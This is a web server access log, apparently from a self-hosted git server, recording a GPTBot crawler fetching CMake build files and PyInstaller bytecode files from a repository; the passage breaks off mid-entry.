- GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11826] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:00:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:15:00:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9941] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:15:00:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 14344] [Gzip 8.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:15:00:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9958] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:00:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 672] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:00:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10075] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:00:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:00:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16051] [Gzip 5.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:00:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 9951] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:00:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:00:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9958] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:00:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10074] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:00:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11023] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:00:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9953] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:00:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12012] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:00:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:15:00:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 672] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:00:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9954] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:00:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 8040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:15:00:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16404] [Gzip 12.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:15:00:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 21844] [Gzip 12.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:15:00:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 24024] [Gzip 15.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:15:00:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 6151] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:15:00:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 4858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:15:00:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9936] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:15:00:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 9961] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:15:00:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 11517] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:15:00:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 777] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:15:00:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 73579] [Gzip 20.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:15:00:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 11271] [Gzip 3.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:00:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 32204] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:15:00:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10178] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:00:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9938] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:15:00:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 14339] [Gzip 8.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:15:00:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11193] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:00:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 29808] [Gzip 7.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:00:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 29811] [Gzip 7.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:00:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 234] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:00:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 10948] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs" -[17/Feb/2026:15:00:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11022] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:00:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16048] [Gzip 5.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:00:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12010] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:00:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 9970] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:15:00:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9937] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:15:00:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9934] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:15:00:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 